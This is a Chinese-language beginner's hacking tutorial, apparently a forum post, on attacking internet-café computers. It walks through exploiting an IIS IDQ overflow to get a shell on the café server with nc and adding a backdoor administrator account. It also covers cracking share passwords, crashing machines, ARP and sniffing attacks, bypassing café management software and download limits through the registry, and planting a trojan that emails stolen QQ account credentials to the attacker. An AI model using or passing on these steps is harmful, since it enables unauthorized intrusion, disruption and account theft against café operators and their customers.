|
入侵网吧主机
当然,首先确定主机的ip地址。运行c:\command.com(怎么运行?后面介绍),输入ipconfig得到自己的ip,比如168.192.1.14,则主机ip应为192.168.1.1,下载SuperScan30-CN.zip,扫描ip添上它,呵呵!看看它到底开了什么端口,如果开了80端口,那么恭喜你了,为了进一步确认,http://192.168.1.1,是不是出现“
正在建立
您想要连接的站点目前没有默认页。可能正在被进行升级。
请稍候再试此站点。假如问题仍然存在,请与 Web 站点管理员联系。
”,如果真是,那么就可以进一步攻击了.我们菜鸟就用idq益出吧!
下好,nc.exe,
IISIDQ.zip
运行IISMiscOverflowV2_Build0013.exe,被攻击地址:网吧主机ip,port:80,单选框勾上“益出后在一个端口监听”,监听端口:813,操作系统类型选择
iis中文sp2
iis中文sp1
iis中文sp0
中的一个,一般是sp2成功的概率高点,不过没成功你可以多试记个。
再在本地command.com输入
nc -vv 192.168.1.1 813
哈哈,我们登陆了!
net user test test123 /add /*创建一用户名test密码test123的用户
net localgroup administrators test /add /*把test加入到administrators组*/
由于nt和98不能ipc$,所以应该打开它的3389,这里你可以参考wawa的《菜鸟打开3389端口》的文章,^再从http://www.sandflee.net/wawa提供的web登陆3389进行连接(终端服务客户端),对你网吧的主机进行控制!
不过,我相信没几个网管还会犯这种低级错误,更多的我们会遇到只开了135,139或者干脆只有135的情况,这时就更考验你的耐心和细致的思维了。你需要收集更多的资料,推荐小榕的流光和WMICracker.exe,用法自己去netxeyes.com找,我就不多说了PP(最好把破获的‘万象’密码,还原精灵密码等等加入到你的密码文档里)
2,入侵网吧分机
大量的网吧把游戏盘,更有甚者把系统盘(c共享出来,以为设置了密码就无事了。其实利用98的共享漏洞很快就可以得到共享密码,需要的利用工具是http://www.heibai.net/download/show.php?id=1465&;down=1 ,这样就可以进入别的机器的硬盘。这个时候在c:\command.com内输入c:\con\con或者c: ull ull就可以叫它蓝屏死机,不过如果你的机器没有打补丁的话照样死掉(这叫做损人不利己呀:PP).
3,如何在网吧里搞破坏
1)arp攻击,推荐xfocus的“局域网终结者”,可以指定ip地址进行攻击,使被攻击者完全从网上掉下来,还有一种可能不断弹出网卡地址冲突的警告对话框,当然要是对方在打cs或者网络游戏的话那就惨了
2)蓝屏炸弹攻击。孤独剑客的iphaker可以很好地完成任务(前提当然是对方有这个漏洞)
3)嗅探攻击,这个不说什么,因为我也不懂,只知道小榕为此写了个arpsniffer,大家当下来就知道怎么用了,不过不要被网管逮个正着啊!
4,网吧管理软件破解
其实这个应该放到所有之前。这里主要针对万象,其它的基本上都一样。
1)进入硬盘:方法真是多如牛毛,我认为最简单而又有效的是利用QQ上的TBrowser.exe,
直接在地址栏输入c:\,d:\……即可.当然你也可以利用些机器上现存的软件(比如QQ的发送文件,frontpage,winzip,winrar等)
2)解除下载限制:在硬盘上建立如下内容的文件(没有notepad.exe怎么办?难道硬盘上连.txt文件都没有?打开一个,文件-->新建,不就ok了?)
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1803"=dword:00000000
请注意REGEDIT4“4”前面没有空格,以下空一行,项名称后面空一行!
存为任意的reg文件即可,运行,把这个注册表文件导入系统注册表,再试试看I以下载了吧!
3)获得万象管理软件的管理密码,下载wx1.0.zip,解压缩,运行即可得到!简单吧!~~得到了密码,一切都显得那么简单,“开始”--退出即可。。
5,得到还原精灵密码
搞掂了还原精灵,才可以进行下面的工作,不然被还原精灵一还原,就没什么搞头的了。
6,如何盗取QQ号码
这里推荐广外女生的“广外幽灵”,她不是简单的键盘记录类的工具。首先,你必须需要找到一个不需要smtp身份验证的邮箱,不要告诉我你用163.com,sohu.com的,因为这种门户网站出于安全性的考虑,都增加了smtp验证机制,象21cn.com
现在也有了。最好到什么信息港,学校的邮件服务器去申请。如何知道自己的邮箱是否带有smtp验证呢?
要明白的几点:
smtp默认端口25
smtp是一个发送信笺的协议
学会从邮箱提供商那里得到自己的smtp服务器(这里假设为smtp.server.com)
ok,开始吧!
nc -vv smtp.server.com 25 /*登陆服务器*/
HELLO
MAIL FROM:cocoruder@163.com /*标明发送人地址*/
RCPT TO:mymail@server.com /*标明收件人地址*/
DATA
qhghsdjh /*随便输拉*/
.这里回车换行
QUIT
这里采用匿名的方式通过smtp服务器发送邮件,如果成功,表示不需要验证,否则,必有错误提示。
ok,赶快去申请个没有smtp验证的邮箱吧!
添好广外幽灵,生成服务端,在机器上运行下就可以,以后就等着去你的邮箱拿QQ吧!
不过一般的网吧里都会有金山毒霸之类的杀毒软件,你当然可以把它们卸载掉。
|
|